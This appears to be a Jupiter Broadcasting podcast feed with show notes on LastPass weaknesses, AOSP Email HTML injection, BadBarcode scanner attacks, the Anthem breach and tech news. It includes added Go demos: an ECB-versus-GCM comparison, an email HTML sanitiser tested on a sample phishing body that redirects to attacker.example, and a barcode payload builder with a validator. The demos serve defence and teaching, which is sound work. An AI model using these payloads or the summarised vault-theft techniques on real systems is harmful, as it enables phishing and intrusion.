gmail – Jupiter Broadcasting
https://www.jupiterbroadcasting.com
Open Source Entertainment, on Demand. Feed generated Thu, 19 Mar 2020 22:52:33 +0000 (en-US, WordPress 5.5.3).

Brunch with Brent: Stuart Langridge | Jupiter Extras 65
https://original.jupiterbroadcasting.net/140427/brunch-with-brent-stuart-langridge-jupiter-extras-65/
Fri, 20 Mar 2020 04:00:00 +0000

Show Notes: extras.show/65

The post Brunch with Brent: Stuart Langridge | Jupiter Extras 65 first appeared on Jupiter Broadcasting.

Google Reads Your Email | TechSNAP 325
https://original.jupiterbroadcasting.net/116171/google-reads-your-email-techsnap-325/
Tue, 27 Jun 2017 20:17:17 +0000

New Ransomware Variant Compromises Systems Worldwide: some infections may be associated with software update systems for a Ukrainian tax accounting package called MeDoc. MeDoc posts […]

Show Notes:

Massive cyberattack hits Europe with widespread ransom demands

Google Says It Will No Longer Read Users’ Emails To Sell Targeted Ads

Does US have right to data on overseas servers? We’re about to find out


Feedback


Round Up:


A Keyboard Walks into a Barcode | TechSNAP 242
https://original.jupiterbroadcasting.net/90821/a-keyboard-walks-into-a-barcode-techsnap-242/
Thu, 26 Nov 2015 08:54:08 +0000


A research team finds various ways to attack LastPass, how to use a cocktail of current Android exploits to own a device & hacking a point of sale system using poisoned barcodes!

Plus some great questions, our answers, a rockin roundup & much, much more!

Thanks to: DigitalOcean, Ting, iXsystems


— Show Notes: —

Even the last pass will be stolen

  • “During one of Alberto’s red team pentests, he gained access to several machines and found that all of them had files with references to LastPass. He came to me and told me it would be cool to check how LastPass works and if it was possible to steal LastPass credentials. 10% of our time is for research so we made that our small project.”
  • “We found how creds were stored locally and wrote a Metasploit plugin so he could use it to extract vault contents from all the compromised machines. Thanks to the module, he was able to obtain SSH keys to critical servers and the pentest was a success.”
  • They tested three different scenarios:
  • Client side attacks: A post-exploitation scenario in which an attacker has certain access to the victim’s machine (no root access needed)
  • LastPass side attacks: A scenario in which LastPass employees, attackers compromising their servers, or anyone MiTMing the connection is the attacker
  • Attacks from the outside: Attackers that are not on the client nor on LastPass servers side.
  • They used a number of different approaches
    • Using cookies
    • Abusing account recovery to obtain the encryption key
    • Bypassing 2 factor authentication
  • “URLs/Icons are encoded, not encrypted: This means that there is no privacy. If you like shady pr0n or you are registered in questionable forums, anyone looking at your encrypted vault will know it. Also, if you reset your password in some site and update the LastPass vault account when prompted for it, the unique reset password URL may be stored as well. If the webmaster did not do a good job of expiring the unique link, you gave LastPass the link to reset your password again.”
  • “Credentials often encrypted with ECB mode: ECB is a weak encryption method that should never be used. LastPass will know if you are reusing passwords from looking at the cipher text. This is bad because LastPass can go check any of the existing password dumps out there, see if you are registered in one of the hacked sites”
  • “what would happen if we google “extensions.lastpass.loginpws”. You guessed it! People are sharing their encrypted LastPass credentials with the rest of the world without their knowledge. You can also find credentials in pastebin. The best part is that now you know how to decrypt them and everything you need is right there.”
  • Recommendations For you:
  • Use the binary version of the plugin
  • Do not store the master password
  • Activate the new Account Recovery over SMS
  • Audit your vault for malicious JS payloads
  • Don’t use “password reminder”
  • Activate 2FA
  • Add country restrictions
  • Disallow TOR logins
  • Recommendations For LastPass
  • Get rid of custom_js!
  • Encrypt the entire vault in one chunk
  • Don’t use ECB
  • Use PBKDF2 between client and LastPass also
  • Use cert pinning
  • Embrace open source
  • Adopt a retroactive, cash rewarded bug bounty program 😉
  • Additional Coverage
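The ECB point above is easy to see in code. The Go program below is an added example written for these notes, not code from the researchers or from LastPass: it encrypts a constructed three-entry vault (two entries deliberately share a password) once with AES-ECB and once with AES-GCM under a fresh nonce, then groups entries by ciphertext the way the service, or anyone who copied the vault off disk, could. Under ECB the two reused passwords produce byte-identical ciphertexts, so the reuse is visible without the key; under GCM every ciphertext differs. The key, site names and passwords are demo values.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// pkcs7Pad pads pt to a whole number of AES blocks.
func pkcs7Pad(pt []byte) []byte {
	n := aes.BlockSize - len(pt)%aes.BlockSize
	return append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// EncryptECB encrypts with AES in ECB mode: every 16-byte block is encrypted
// independently and deterministically, so equal plaintexts under the same key
// always give equal ciphertexts. That is the property the researchers flagged.
func EncryptECB(key, pt []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	padded := pkcs7Pad(pt)
	ct := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(ct[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return ct
}

// EncryptGCM encrypts with AES-GCM under a fresh random nonce (prepended to
// the output), so the same password encrypted twice yields different bytes
// and the ciphertext is also integrity-protected.
func EncryptGCM(key, pt []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		panic(err)
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		panic(err)
	}
	return gcm.Seal(nonce, nonce, pt, nil)
}

// ReuseGroups is what a party holding only ciphertexts (the service, or
// whoever copied the vault off disk) can compute under ECB: which entries
// share a password, without decrypting anything.
func ReuseGroups(cts map[string][]byte) map[string][]string {
	groups := map[string][]string{}
	for site, ct := range cts {
		k := hex.EncodeToString(ct)
		groups[k] = append(groups[k], site)
	}
	return groups
}

// LargestGroup returns the size of the biggest set of entries sharing one
// ciphertext; 1 means no reuse is visible from the ciphertexts alone.
func LargestGroup(cts map[string][]byte) int {
	largest := 0
	for _, sites := range ReuseGroups(cts) {
		if len(sites) > largest {
			largest = len(sites)
		}
	}
	return largest
}

// encryptVault encrypts every entry's password with the given function.
func encryptVault(enc func(key, pt []byte) []byte, key []byte, vault map[string]string) map[string][]byte {
	out := map[string][]byte{}
	for site, pw := range vault {
		out[site] = enc(key, []byte(pw))
	}
	return out
}

// Constructed sample vault (not real data): two entries deliberately share
// a password. demoKey is a fixed 128-bit key for the demonstration only.
var sampleVault = map[string]string{
	"forum.example": "correct horse battery",
	"bank.example":  "correct horse battery",
	"mail.example":  "a different passphrase",
}

var demoKey = []byte("0123456789abcdef")

func main() {
	ecb := encryptVault(EncryptECB, demoKey, sampleVault)
	gcm := encryptVault(EncryptGCM, demoKey, sampleVault)
	fmt.Println("ECB: largest group of identical ciphertexts =", LargestGroup(ecb))
	fmt.Println("GCM: largest group of identical ciphertexts =", LargestGroup(gcm))
}
```

Run with `go run .`: the ECB group size is 2 and the GCM group size is 1. The recommendation to LastPass to "encrypt the entire vault in one chunk" closes the same hole from the other direction: with a single authenticated ciphertext over the whole vault there are no per-field ciphertexts left to compare.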

Google AOSP Email App HTML Injection

  • The Google AOSP Email app is vulnerable to HTML injection in the email body.
  • It allows a remote attacker to send a crafted email carrying a payload that redirects the user to a target URL as soon as they open the message.
  • The issue is not related to the email provider configured in the app but to incorrect filtering of potentially dangerous tags on the client side.
  • The researchers sent an email containing a meta tag with the http-equiv="refresh" attribute to redirect the user to the target URL.
  • This vulnerability has dangerous potential for phishing. With a bit of creativity, a convincing phishing scenario is plausible.
  • Other vectors, such as intent-based URIs, are also possible. Just this week we learned that at MobilePwn2Own an exploit was showcased for a vulnerability in Chrome’s V8 JavaScript engine, where the user only needs to browse to a page and it installs an APK without any user interaction.
  • During the MobilePwn2Own demo of the V8 vulnerability, security researcher Guang Gong showed how easy it was to take advantage of an Android device.

“As soon as the phone accessed the website the JavaScript v8 vulnerability in Chrome was used to install an arbitrary application (in this case a BMX Bike game) without any user interaction to demonstrate complete control of the phone.” While a BMX game is relatively harmless in the grand scheme of things, a lot more damage could have been done.

  • This exploit combined with the Email app vulnerability is a very dangerous combo.
  • The app ships in all Android versions up to KitKat (4.4.4). It exists because, until Gmail for Android 5.0, it was the only way to configure other email providers (Exchange servers, Yahoo, Hotmail, etc.) on Android.
  • From Android Lollipop (5.0) upwards, the AOSP app no longer exists in the system.
  • Since there are probably still a lot of users on the AOSP Email app, the researchers decided to contact Google about the issue.
  • Google replied that they have no plans to fix this vulnerability.
  • Users on Android Ice Cream Sandwich (4.0.3) and later should migrate their accounts from the AOSP Email app to the Gmail app, since Gmail 5.0+ is supported there.
  • Users on earlier Android versions should upgrade to Ice Cream Sandwich (4.0.3) or above where possible, or use a different email client.
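What the researchers describe is a missing tag filter on the receiving side. The Go function below is an added example (not the AOSP Email code and not the researchers' proof of concept) of the filter an HTML mail renderer needs: it tokenises the body, keeps only an allowlist of formatting tags and of the href/title attributes, skips the content of script and style elements, and refuses javascript: and data: hrefs. A <meta http-equiv="refresh"> is simply not on the allowlist, so it never reaches the renderer, whatever its case or attribute order. The sample message, the attacker.example and mail.example hosts and the allowlists are constructed for the demo; a production client should use a maintained HTML parser and sanitiser rather than this one.

```go
package main

import (
	"fmt"
	"html"
	"regexp"
	"strings"
)

// Tags a mail client may render; anything else (meta, script, iframe, object,
// embed, base, link, style, form, html/body) is dropped. Allowlist, not denylist.
var allowedTags = map[string]bool{
	"p": true, "br": true, "b": true, "i": true, "u": true, "em": true, "strong": true,
	"a": true, "ul": true, "ol": true, "li": true, "div": true, "span": true, "pre": true,
}

// Attributes kept on allowed tags: no on* handlers, no style, no src.
var allowedAttrs = map[string]bool{"href": true, "title": true}

// Elements whose text content is dropped together with the tag.
var closeRe = map[string]*regexp.Regexp{
	"script": regexp.MustCompile(`(?i)</script`),
	"style":  regexp.MustCompile(`(?i)</style`),
}

// attrRe matches name="value", name='value', name=value or a bare name.
var attrRe = regexp.MustCompile(`([A-Za-z][\w:-]*)\s*(?:=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?`)

// splitTag lower-cases the element name ("META HTTP-EQUIV=refresh" -> "meta"),
// reports whether this is a closing tag, and returns the attribute text.
func splitTag(inner string) (name string, closing bool, attrs string) {
	inner = strings.TrimSpace(inner)
	if strings.HasPrefix(inner, "/") {
		closing, inner = true, strings.TrimSpace(inner[1:])
	}
	if end := strings.IndexAny(inner, " \t\r\n/"); end != -1 {
		return strings.ToLower(inner[:end]), closing, inner[end:]
	}
	return strings.ToLower(inner), closing, ""
}

// filterAttrs re-serialises only allowlisted attributes and refuses href
// values that use the javascript: or data: schemes.
func filterAttrs(attrs string) string {
	var out strings.Builder
	for _, m := range attrRe.FindAllStringSubmatch(attrs, -1) {
		name, val := strings.ToLower(m[1]), strings.Trim(m[2], `"'`)
		scheme := strings.ToLower(strings.TrimSpace(val))
		if !allowedAttrs[name] || (name == "href" && (strings.HasPrefix(scheme, "javascript:") || strings.HasPrefix(scheme, "data:"))) {
			continue
		}
		fmt.Fprintf(&out, ` %s="%s"`, name, html.EscapeString(val))
	}
	return out.String()
}

// SanitizeEmailHTML walks the body tag by tag, keeping text and allowlisted tags
// and discarding everything else, so <meta http-equiv="refresh"> never reaches
// the renderer. Limitation: a literal '>' inside a quoted attribute value ends
// the tag early; a production client should use a full HTML parser instead.
func SanitizeEmailHTML(body string) string {
	var out strings.Builder
	for i := 0; i < len(body); {
		lt := strings.IndexByte(body[i:], '<')
		if lt == -1 {
			out.WriteString(body[i:])
			break
		}
		out.WriteString(body[i : i+lt])
		i += lt
		gt := strings.IndexByte(body[i:], '>')
		if gt == -1 { // unterminated tag: drop the remainder rather than guess
			break
		}
		name, closing, attrs := splitTag(body[i+1 : i+gt])
		i += gt + 1
		if re := closeRe[name]; re != nil && !closing { // skip <script>...</script> content too
			loc := re.FindStringIndex(body[i:])
			if loc == nil {
				break
			}
			i += loc[0]
			continue
		}
		switch {
		case !allowedTags[name]: // tag dropped; the text around it is kept
		case closing:
			out.WriteString("</" + name + ">")
		default:
			out.WriteString("<" + name + filterAttrs(attrs) + ">")
		}
	}
	return out.String()
}

// Constructed phishing message of the kind described above; attacker.example
// and mail.example are placeholder hosts.
const phishingMail = `<html><body><meta http-equiv="refresh" content="0;url=http://attacker.example/login">` +
	`<p>Your mailbox is <b>full</b>.</p><a href="javascript:alert(1)" onclick="steal()" title="x">Fix it</a>` +
	`<script>document.location="http://attacker.example"</script>` +
	`<a href="http://mail.example/">Open webmail</a></body></html>`

func main() {
	fmt.Println(SanitizeEmailHTML(phishingMail))
}
```

For the constructed message the output is the paragraph, a link with only its title, and the legitimate webmail link; the meta refresh, the javascript: href, the onclick handler and the script body are all gone.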

One Barcode Spoils the Whole Bunch

  • At this week’s PanSec 2015 conference in Tokyo, researchers with Tencent’s Xuanwu Lab demonstrated a number of attacks using poisoned barcodes, scanned by numerous keyboard-wedge barcode scanners, to open a shell on a machine and virtually type control commands.
  • The attacks, dubbed BadBarcode, are relatively simple to carry out, and the researchers behind the project said it’s difficult to pinpoint whether the scanners or the host systems need to be patched, or both, or neither.
  • “We do not know what the bad guys might do. BadBarcode can execute any commands in the host system, or [implant] a Trojan,” said Yang Yu, who collaborated with colleague Hyperchem Ma. Yu, last year, was rewarded with a $100,000 payout from Microsoft’s Mitigation Bypass Bounty for a trio of ASLR and DEP bypasses. “So basically you can do anything with BadBarcode.”
  • Yu said his team was able to exploit the fact that most barcodes carry not only numeric and alphanumeric characters but, depending on the protocol being used, the full ASCII character set.
  • Barcode scanners, meanwhile, are essentially keyboard emulators. If they support protocols such as Code 128, which can encode ASCII control characters, an attacker can create a barcode that, when read, opens a shell on the computer the scanner is connected to and types commands into it.
  • Yu and Ma said during their presentation that Ctrl+ combinations map to ASCII codes and can be used to trigger hotkeys registered with the Ctrl+ prefix, launching common dialogs such as OpenFile, SaveFile and PrintDialog. An attacker could use those hotkeys to browse the computer’s file system, launch a browser, or execute programs.
  • Yu suggested that barcode scanner manufacturers not enable additional features beyond the standard protocols by default, and not transmit ASCII control characters to the host device by default.
  • Hosts in IoT environments, meanwhile, should think twice about using barcode scanners that emulate keyboards, and should disable system hotkeys, Yu said.

  • Slides
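To make the hotkey point concrete: Ctrl+O, Ctrl+P and the other Ctrl+letter combinations have ASCII codes (the letter's code with the two high bits cleared), and Code 128 Set A can encode those codes, so a keyboard wedge that forwards control characters "presses" the hotkey. The Go program below is an added example, not the Xuanwu Lab tooling: it builds such a payload, names the keystrokes a given scan would produce (useful when reviewing scanner logs), and shows the host-side check a point-of-sale application should apply regardless of how the scanner is configured, an allowlist for what a product code may look like. The product-code pattern, the "calc.exe" text and the sample product number are constructed for the demo, and which dialog a particular Ctrl+letter opens depends on the foreground application.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Ctrl+<letter> on a PC keyboard produces the ASCII control character
// letter & 0x1f (Ctrl+O -> 0x0F, Ctrl+P -> 0x10). Code 128 Set A can encode
// all of ASCII 0x00-0x1F, so a barcode can carry these bytes and a keyboard
// wedge scanner that forwards control characters types them as hotkeys.
func ctrl(letter byte) byte { return letter & 0x1f }

// BadBarcodePayload builds the character sequence for a barcode that presses
// a hotkey, types text into whatever dialog that opened, and presses Enter.
// Constructed for the demo; the effect depends on the foreground application.
func BadBarcodePayload(hotkey byte, text string) string {
	return string([]byte{ctrl(hotkey)}) + text + "\r"
}

var ctrlNames = map[byte]string{'\t': "Tab", '\n': "LF", '\r': "Enter", 0x1b: "Esc"}

// DescribeControls names every non-printable byte in a scan so an operator or
// log reviewer can see which keystrokes the barcode would have produced.
func DescribeControls(scan string) []string {
	var out []string
	for _, c := range []byte(scan) {
		switch {
		case c >= 0x20 && c < 0x7f: // printable ASCII: typed as-is
			continue
		case ctrlNames[c] != "":
			out = append(out, ctrlNames[c])
		case c < 0x20:
			out = append(out, fmt.Sprintf("Ctrl+%c", c|0x40)) // 0x0F -> 'O'
		default:
			out = append(out, fmt.Sprintf("0x%02X", c))
		}
	}
	return out
}

// productCode is the host-side allowlist: what a scanned product code may look
// like (assumed pattern for the demo). Anything else, including any control
// character, is rejected before the application acts on it.
var productCode = regexp.MustCompile(`^[0-9A-Z-]{4,32}$`)

var ErrBadScan = errors.New("scan rejected: not a product code")

// ValidateScan is the check a POS application should run on every string a
// keyboard-wedge scanner delivers, whatever the scanner's own configuration.
func ValidateScan(scan string) (string, error) {
	s := strings.TrimRight(scan, "\r\n") // scanners commonly append a terminator
	if !productCode.MatchString(s) {
		return "", ErrBadScan
	}
	return s, nil
}

func main() {
	payload := BadBarcodePayload('O', "calc.exe") // constructed demo payload
	fmt.Printf("payload bytes: % x\n", []byte(payload))
	for _, scan := range []string{"4006381333931\r", payload} {
		if code, err := ValidateScan(scan); err != nil {
			fmt.Println("rejected:", err, "keystrokes:", DescribeControls(scan))
		} else {
			fmt.Println("accepted:", code)
		}
	}
}
```

The allowlist is the part that matters: disabling control characters on the scanner, as Yu suggests, helps, but the host cannot know how a particular scanner is configured, so it should only ever accept the character set it expects.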


Feedback:


Round-Up:


Gmail in the Black Tank | LAS 382
https://original.jupiterbroadcasting.net/87616/gmail-in-the-black-tank-las-382/
Sun, 13 Sep 2015 09:42:44 +0000


After the last straw Noah dumps Gmail, shares his battle and solution & Chris runs down five great open source Gmail alternatives.

Plus why Dell stopped shipping the XPS 13 in Europe, a big update to a Linux video editor, the news of the week & more!

Thanks to: DigitalOcean, Ting


— Show Notes: —


Brought to you by: System76

Open source webmail clients for browser-based email

Gmail has enjoyed phenomenal success, and regardless of which study you choose to look at for exact numbers, there’s no doubt that Gmail is towards the top of the pack when it comes to market share. For certain circles, Gmail has become synonymous with email, or at least with webmail. Many appreciate its clean interface and the simple ability to access their inbox from anywhere.

But Gmail is far from the only name in the game when it comes to web-based email clients. In fact, there are a number of open source alternatives available for those who want more freedom, and occasionally, a completely different approach to managing their email without relying on a desktop client.

Let’s take a look at just a few of the free, open source webmail clients out there available for you to choose from.

FastMail: Fast, reliable email

FastMail is the choice of over 100,000 individuals, families and businesses. We deliver the highest standards of security, privacy and reliability for your email, calendars and contacts, backed up by our exemplary 15-year track record.

KolabNow

With over 108 billion business emails sent daily, email is the backbone of professional communication. Kolab provides the email, contact and file sharing functionality that empowers enterprise communication.

Looking for a fully featured collaboration and communication platform? Seeking the convenience of the cloud, without having to worry about who else might have access? Want to ensure that your data is stored only in a single legislation, with highest barriers to data disclosure? Kolab Now is that service.

Safeguard your professional and personal data with Kolab Now. Enjoy the world’s best privacy legislation and terms of service that put you first. All of this with a feature set complete enough to run your entire business collaboration.

DarkMail

Silent Circle and Lavabit are developing a new way to do email with end-to-end encryption. We welcome like-minded organizations to join our alliance.

To bring the world our unique end-to-end encrypted protocol and architecture that is the ‘next-generation’ of private and secure email. As founding partners of The Dark Mail Technical Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the world’s first end-to-end encrypted ‘Email 3.0’ throughout the world’s email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

— PICKS —

Runs Linux

Shanghai Subway Runs Linux

Hi guys, for 5 years I’ve been living in Shanghai and I suddenly discovered that Ubuntu is running the streaming TV in Shanghai’s subway! Here are a few links to the pictures

https://i.imgur.com/DFynJVU.jpg


https://i.imgur.com/EBbfytP.jpg

A link to the incredible expansion of Shanghai’s subway:
https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/SHM_evolution_mid.gif/400px-SHM_evolution_mid.gif

Sent in by Dasti

Desktop App Pick

Lighttable
  • Connects you to your creation with instant feedback, showing how data values flow through your code.

  • Easily customizable from keybinds to extensions to be completely tailored to your specific project.

  • Try new ideas quickly and easily. Ask questions about your software, to give you a more profound understanding of your code.

  • Embed anything you want, from graphs to games to running visualizations.

  • Everything from eval and debugging to a fuzzy finder for files and commands to fit seamlessly into your workflow.

  • An elegant, lightweight, beautifully designed layout so your IDE is no longer cluttered.

LightTable in Action

Weekly Spotlight

Flowblade 1.2

Flowblade 1.2 is the ninth release of Flowblade.

  • Flowblade has now been ported to GTK3.

  • The process was not as straightforward as one might think, but eventually everything worked out. There always seemed to be just one more little change in the API that required all instances to be fixed by hand. Luckily there was a conversion script available that did most of the grunt work to get things going.

  • We did get something in return. A small but perceptible responsiveness improvement was gained, probably because GTK3 provides a Cairo widget for creating custom widgets that is now used instead of the project-specific Cairo widget that was used before. GTK3 also seems to render widgets a bit crisper.
  • I really hope that major API-breaking version jumps for widget toolkits are avoided as much as possible. Projects with a large interface and small manpower can really suffer here.

  • There were some other major developments during the cycle too:

  • All rendering was moved out of process, as the in-process rendering was found not to work correctly in some cases.

  • Dark theme support was improved. It is now possible to use a dark theme just by setting a preference if the GTK3 theme used has a dark variant available.
  • Small screen support has been upgraded. The application now works better on 768px height screens.

Spokane Roadtrip Meetup


— NEWS —

Dell XPS 13 Developer Edition No Longer Available for Sale in Europe

“Unfortunately Europe has already run through their forecasted inventory (they sold better than we expected). The US still has inventory on hand. Because there will be a next gen coming out we won’t be getting any more of this model. Thanks for the support!” wrote Dell’s Barton George on his website. He’s the same guy who announced that the XPS 13 was brought back to the shop a while back.

Mozilla: data stolen from hacked bug database was used to attack Firefox

Mozilla added that the attacker accessed 185 non-public Firefox bugs, of which 53 involved “severe vulnerabilities.” Ten of the vulnerabilities were unpatched at the time, while the remainder had been fixed in the most recent version of Firefox at the time.

Attack code exploiting Android’s critical Stagefright bugs is now public

The critical flaws, which reside in an Android media library known as libstagefright, give attackers a variety of ways to surreptitiously execute malicious code on unsuspecting owners’ devices. The vulnerabilities were privately reported in April and May and were publicly disclosed only in late July. Google has spent the past four months preparing fixes and distributing them to partners, but those efforts have faced a series of setbacks and limitations.

We Did It!! (Mycroft was successfully funded!) – YouTube

We have successfully funded our Kickstarter campaign! Let us thank you and learn about what’s in store for the Mycroft team! Remember to check out our Kickstarter at: https://mycroft.ai/kickstarter

Feedback:

Road Trip Playlist

Watch the adventures, productions, road trips, trails, mistakes, and fun of the Jupiter Broadcasting mobile studio.

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

— CHRIS’ STASH —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com


Sanction IT | Tech Talk Today 151
https://original.jupiterbroadcasting.net/79742/sanction-it-tech-talk-today-151/
Wed, 01 Apr 2015 09:16:51 +0000


The White House announces an executive order allowing sanctions against cyber war threats, some downsides of the Galaxy S6 Edge, an April Fools roundup & more!


Show Notes:

A New Tool Against Cyber Threats — Medium

It’s one of the great paradoxes of our Information Age — the very technologies that empower us to do great good can also be used by adversaries to inflict great harm. The same technologies that help keep our military strong are used by hackers in China and Russia to target our defense contractors and systems that support our troops. Networks that control much of our critical infrastructure — including our financial systems and power grids — are probed for vulnerabilities by foreign governments and criminals.

Cyber intrusions and attacks — many of them originating overseas — are targeting our businesses, stealing trade secrets, and costing American jobs. Iranian hackers have targeted American banks. The North Korean cyber attack on Sony Pictures destroyed data and disabled thousands of computers. In other recent breaches that have made headlines, more than 100 million Americans had their personal data compromised, including credit card and medical information.

Living life on the S6 Edge | The Verge

The Galaxy S6 Edge also doesn’t play too nicely with Google’s Material Design. Samsung has my eternal appreciation for following Google’s lead in moving to a cleaner, more minimalist interface, but Material Design emphasizes flatness and geometric regularity, which the Edge’s warping side screens disturb. They create a sort of vignette effect on white pages and are a hindrance rather than a help when editing photos.

Meet the Asus Chromebook Flip, a $249 Chrome OS tablet with a 360-degree hinge | PCWorld

The Chromebook Flip squeezed an adequate supply of connectivity into its slender profile. On one side, you’ll see two USB 2.0 ports, an SD card slot, HDMI, and an audio jack. On the other, you’ll see power and volume buttons, plus the DC power port.

Under the hood you’ll find 2GB of RAM and the Rockchip 3288 CPU. Rockchip, a new partner for Google, brings less expensive, more power-efficient CPUs to the Chromebook lineup. Google also announced new Chromebooks from Haier and Hisense with the same chip. Benchmarks from our hands-on with the new Hisense Chromebook indicate that this processor holds up well compared to older ARM chips.

Google pushes Chrome OS software, with or without Chromebooks – CNET

To that end, one of Google’s newest additions to the lineup of devices, the Chromebit, hawks Chrome OS without even trying to sell a Chromebook laptop.

RadioShack co-branding of stores with Sprint wins court approval | Reuters

A plan to salvage RadioShack Corp’s RSHCQ.PK business by co-branding most of its 1,740 surviving stores with cellular phone provider Sprint Corp (S.N) earned U.S. bankruptcy court approval on Tuesday, ending four days of contested court hearings.

The stores are what survived of more than 4,000 outlets after RadioShack went bankrupt in February. Founded in 1921, the chain was a go-to retailer for electronics before becoming increasingly irrelevant in the digital age.

Gentoo announces total website makeover – Gentoo Linux

Gentoo Linux today announced the launch of its new totally revamped and more inclusive website which was built to conform to the CGA Web(tm) graphics standards.

Smartbox by Inbox: the mailbox of tomorrow, today – YouTube

We’re excited to introduce Smartbox—a better, smarter mailbox that fuses physical mail with everything you love about the electronic kind.

Smartbox is currently in field trial—stuck in the ground, in a field—for Inbox by Gmail customers. If you’re not yet using Inbox, simply email inbox@google.com any time before April 2 to be invited, and to reserve your spot on the Smartbox waitlist.

Your TechSNAP Story | TechSNAP 200
https://original.jupiterbroadcasting.net/76892/your-techsnap-story-techsnap-200/
Thu, 05 Feb 2015 19:49:10 +0000


A new major security breach at a large health insurance firm could expose 10s of millions, a phone phishing scam anyone could fall for & we celebrate our 200th episode with your TechSNAP stories.

Then it’s a storage spectacular Q&A & much, much more!

Thanks to: DigitalOcean, Ting, iXsystems


— Show Notes: —

Security breach at health insurance firm Anthem, could expose 10s of millions

  • “Anthem Inc., the nation’s second largest health insurer, disclosed Wednesday that hackers had broken into its servers and stolen Social Security numbers and other personal data from all of its business lines. “
  • “Anthem didn’t specify how many consumer records may have been breached, but it did say all of the company’s business units are affected. The figures from Anthem’s Web site offer a glimpse at just how big this breach could be: “With nearly 69 million people served by its affiliated companies including more than 37 million enrolled in its family of health plans, Anthem is one of the nation’s leading health benefits companies.””
  • “The company said it is conducting an extensive IT forensic investigation to determine what members are impacted.”
  • It is reported that Anthem has hired Mandiant to investigate the attack
  • Exposed data:
    • Full name
    • Date of birth
    • Member ID
    • Social Security number
    • Address
    • Phone numbers
    • Email addresses
    • Employment information
  • “According to Anthem’s statement, the impacted (plan/brands) include Anthem Blue Cross, Anthem Blue Cross and Blue Shield, Blue Cross and Blue Shield of Georgia, Empire Blue Cross and Blue Shield, Amerigroup, Caremore, Unicare, Healthlink, and DeCare. The company said impacted members will receive notice via mail which will advise them of the protections being offered to them as well as any next steps.”
  • “Anthem said once the attack was discovered, the company immediately made every effort to close the security vulnerability, contacted the FBI and began fully cooperating with their investigation.”
  • More detailed information is not available yet, but I am sure we’ll be following this story in the weeks to come
  • Additional Coverage – ThreatPost
  • Additional Coverage

Hacked hotel phones used in bank phishing scam

  • “A recent phishing campaign targeting customers of several major U.S. banks was powered by text messages directing recipients to call hacked phone lines at Holiday Inn locations in the south. Such attacks are not new, but this one is a timely reminder that phishers increasingly are using lures blasted out via SMS as more banks turn to text messaging to communicate with customers about account activity.”
  • “The above-mentioned phishing attacks were actually a mix of scams known as “SMiShing” — phishing lures sent via SMS text message — and voice phishing or “vishing,” where consumers are directed to call a number that answers with a voice prompt spoofing the bank and instructing the caller to enter his credit card number and expiration date”
  • It seems Holiday Inn’s telephone switching system may have been hacked, and used to record and exfiltrate the stolen information
  • It is likely the hotel also lost out on business from customers actually trying to reach the hotel, and instead getting fake voice prompts for various banks
  • “According to Jan Volzke, Numbercop’s chief executive, these scams typically start on a Saturday afternoon and run through the weekend when targeted banks are typically closed.”
  • ““Two separate Holiday Inns getting hijacked in such short time suggests there is a larger issue at work with their telephone system provider,” he said. “That phone line is probably sitting right next to the credit card machine of the Holiday Inn. In a way this is just another retail terminal, and if they can’t secure their phone lines, maybe you shouldn’t be giving them your credit card.”
  • “A front desk clerk who answered the line on Tuesday said the hotel received over 100 complaints from people who got text messages prompting them to call the hotel’s main number during the time it was hacked.”
  • “Numbercop says the text message lures were sent using email-to-SMS gateways, but that the company also has seen similar campaigns sent from regular in-network numbers (prepaid mobile phones e.g.), which can be harder to catch. In addition, Volzke said, phishers often will target AT&T and Verizon users for use in furthering these schemes.”
  • Volzke says it’s unfortunate that more financial institutions aren’t communicating with their customers via mobile banking apps. “Banking apps are among the most frequently downloaded and used apps,” Volzke said. “If the user has an app from the bank installed, then if the bank really has something to say they should use the in-app messaging method, not text messages which can be spoofed and are not secure. And yet we see almost no bank making use of this.”
  • “Regardless of whether you communicate with your bank via text message, avoid calling phone numbers or clicking links that appear to have been sent via text message from your bank. Also, be extremely wary of any incoming calls from someone calling from your bank. If you think there may be an issue with your account, your best bet is to simply call the number on the back of your credit or debit card.”
  • Example call recording from Numbercop

Your TechSNAP Story


Feedback:


Round-Up:


Gmail isn’t Gmail: it’s gmail | Tech Talk Today 80
https://original.jupiterbroadcasting.net/69847/gmail-isnt-gmail-its-gmail-tech-talk-today-80/
Thu, 23 Oct 2014 10:02:34 +0000


Google is re-thinking email and launches Inbox, a new gmail that’s not gmail, but is connected to your gmail. We’ll explain. Apple Pay hits a few glitches & PC World takes a bold step.


Show Notes:

Inbox is a total reinvention of email from Google | The Verge

The new Gmail app from the Gmail team isn’t technically just an email app, at least if you ask them. It’s called “Inbox,” and it’s being released as an invite-only system that works on the Chrome browser, Android phones, and iPhones. It feels completely native and fast on all of those systems. But it’s a native and fast app that does something 10 degrees away from what you’d expect an email app to do. My first impression of Inbox is that it’s really great, but a little weird.

The basic idea is this: it’s still a Gmail app, but instead of giving you the traditional list of emails, it tries to intelligently give you more information so you don’t have to even open them. Google Now-style info cards appear right in line with your message list, including things like flight times, package tracking, and photos.

It also tries to intelligently “bundle” emails into groups that you can quickly dismiss.

Apple Pay glitch sees some early adopters hit with duplicate charges

APPLE PAY has got off to a shaky start in the US after some shoppers reported that the NFC mobile payments service had charged them twice for purchases.


The Apple Pay problem largely affects Bank of America customers, according to a report on Bloomberg.


